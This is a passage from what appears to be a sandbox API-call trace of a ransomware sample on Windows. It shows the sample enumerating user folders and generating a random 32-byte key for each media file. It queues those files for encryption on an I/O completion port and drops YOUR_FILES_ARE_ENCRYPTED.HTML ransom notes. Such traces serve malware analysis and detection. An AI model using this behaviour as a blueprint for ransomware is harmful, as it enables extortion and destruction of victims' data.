param_1=0x4ebda72, param_2="%02X" | out: param_1="E1") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="B9") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="A1") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="BF") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="BD") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="7C") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="E5") returned 2 [0165.766] wsprintfW 
(in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="11") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="E4") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="EC") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="33") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="4E") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="F1") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="14") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A5") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="10") returned 2 [0165.766] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="13") returned 2 [0165.767] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif" [0165.767] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.767] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0165.772] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d7cdc50, ftCreationTime.dwHighDateTime=0x1d7e1a5, ftLastAccessTime.dwLowDateTime=0x716b8690, ftLastAccessTime.dwHighDateTime=0x1d7e76e, ftLastWriteTime.dwLowDateTime=0x716b8690, ftLastWriteTime.dwHighDateTime=0x1d7e76e, nFileSizeHigh=0x0, nFileSizeLow=0x126a4, dwReserved0=0xa0000003, dwReserved1=0x60, 
cFileName="xxYtajbRq352mO37KBk.bmp", cAlternateFileName="XXYTAJ~1.BMP")) returned 1 [0165.772] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\xxYtajbRq352mO37KBk.bmp") returned 63 [0165.772] lstrcmpW (lpString1="xxYtajbRq352mO37KBk.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.772] PathFindExtensionW (pszPath="xxYtajbRq352mO37KBk.bmp") returned=".bmp" [0165.772] lstrlenW (lpString=".bmp") returned 4 [0165.772] PathFindExtensionW (pszPath="xxYtajbRq352mO37KBk.bmp") returned=".bmp" [0165.772] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5d6844b0, ftCreationTime.dwHighDateTime=0x1d7da8c, ftLastAccessTime.dwLowDateTime=0x40c68b90, ftLastAccessTime.dwHighDateTime=0x1d7e078, ftLastWriteTime.dwLowDateTime=0x40c68b90, ftLastWriteTime.dwHighDateTime=0x1d7e078, nFileSizeHigh=0x0, nFileSizeLow=0x1341a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ZTc_iLMq.mp4", cAlternateFileName="")) returned 1 [0165.772] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4") returned 52 [0165.772] lstrcmpW (lpString1="ZTc_iLMq.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0165.772] PathFindExtensionW (pszPath="ZTc_iLMq.mp4") returned=".mp4" [0165.773] lstrlenW (lpString=".mp4") returned 4 [0165.773] PathFindExtensionW (pszPath="ZTc_iLMq.mp4") returned=".mp4" [0165.773] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.773] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\ztc_ilmq.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0165.773] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=78874) returned 1 [0165.773] GetProcessHeap () returned 0x270000 [0165.773] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0165.778] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="0C") returned 2 [0165.778] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A4") returned 2 [0165.778] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="A6") returned 2 [0165.778] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="40") returned 2 [0165.778] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="05") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="1E") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="54") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="24") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="12") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="05") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="14") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="70") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="AE") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="0E") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="ED") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="32") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="47") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="6B") returned 2 [0165.779] wsprintfW (in: 
param_1=0x4ebda7e, param_2="%02X" | out: param_1="FC") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="7D") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="32") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="AE") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="24") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="3C") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="3D") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="B2") returned 2 [0165.779] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="C3") returned 2 [0165.780] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="7D") returned 2 [0165.780] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="E9") returned 2 [0165.780] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="C0") returned 2 [0165.780] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="C4") returned 2 [0165.780] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="3A") returned 2 [0165.780] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4" [0165.780] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.781] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0165.782] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0xa4aec10, ftCreationTime.dwHighDateTime=0x1d7db5e, ftLastAccessTime.dwLowDateTime=0xac8d1470, ftLastAccessTime.dwHighDateTime=0x1d7e717, ftLastWriteTime.dwLowDateTime=0xac8d1470, ftLastWriteTime.dwHighDateTime=0x1d7e717, nFileSizeHigh=0x0, nFileSizeLow=0x1292e, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ZUHdN4Zd.m4a", cAlternateFileName="")) returned 1 [0165.782] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a") returned 52 [0165.782] lstrcmpW (lpString1="ZUHdN4Zd.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0165.782] PathFindExtensionW (pszPath="ZUHdN4Zd.m4a") returned=".m4a" [0165.782] lstrlenW (lpString=".m4a") returned 4 [0165.782] PathFindExtensionW (pszPath="ZUHdN4Zd.m4a") returned=".m4a" [0165.782] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\zuhdn4zd.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0165.783] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=76078) returned 1 [0165.783] GetProcessHeap () returned 0x270000 [0165.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0165.789] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="C4") returned 2 [0165.789] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="E7") returned 2 [0165.789] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="51") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="80") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | 
out: param_1="B7") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="20") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="1C") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="50") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="EF") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A4") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="E4") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="8D") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D8") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="EB") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="D2") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="2A") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="8D") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="AA") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="5E") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="66") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="26") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="5E") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="A8") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="21") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="10") returned 2 [0165.791] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a" [0165.791] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.791] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0165.794] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4aec10, ftCreationTime.dwHighDateTime=0x1d7db5e, ftLastAccessTime.dwLowDateTime=0xac8d1470, ftLastAccessTime.dwHighDateTime=0x1d7e717, ftLastWriteTime.dwLowDateTime=0xac8d1470, ftLastWriteTime.dwHighDateTime=0x1d7e717, nFileSizeHigh=0x0, nFileSizeLow=0x1292e, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ZUHdN4Zd.m4a", cAlternateFileName="")) returned 0 [0165.816] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0165.826] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0165.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0165.827] WriteFile (in: hFile=0x5a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0165.830] CloseHandle (hObject=0x5a4) returned 1 [0165.830] GetProcessHeap () returned 0x270000 [0165.831] HeapFree (in: hHeap=0x270000, 
dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0165.831] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaf6f2a60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf6f2a60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Roaming", cAlternateFileName="")) returned 0 [0165.831] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0165.831] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 61 [0165.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0165.832] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0165.835] CloseHandle (hObject=0x5a0) returned 1 [0165.835] GetProcessHeap () returned 0x270000 [0165.836] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0165.836] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, 
ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0165.836] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data") returned 40 [0165.836] GetProcessHeap () returned 0x270000 [0165.836] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0165.836] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data" [0165.836] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data\\*" [0165.836] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaf6f2a60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf6f2a60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Roaming", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0165.837] GetProcessHeap () returned 0x270000 [0165.838] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0165.838] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, 
ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Contacts", cAlternateFileName="")) returned 1 [0165.838] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts") returned 32 [0165.838] GetProcessHeap () returned 0x270000 [0165.838] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0165.838] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts" [0165.838] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts\\*" [0165.838] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0165.838] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.839] 
FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8143b5e9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0165.839] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts\\Administrator.contact") returned 54 [0165.839] lstrcmpW (lpString1="Administrator.contact", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.839] PathFindExtensionW (pszPath="Administrator.contact") returned=".contact" [0165.839] lstrlenW (lpString=".contact") returned 8 [0165.839] PathFindExtensionW (pszPath="Administrator.contact") returned=".contact" [0165.840] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.840] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts\\desktop.ini") returned 44 [0165.840] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.840] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0165.840] lstrlenW (lpString=".ini") returned 4 [0165.840] PathFindExtensionW (pszPath="desktop.ini") 
returned=".ini" [0165.840] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0165.840] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0165.840] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0165.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\contacts\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0165.841] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0165.843] CloseHandle (hObject=0x5a0) returned 1 [0165.843] GetProcessHeap () returned 0x270000 [0165.845] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0165.845] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, 
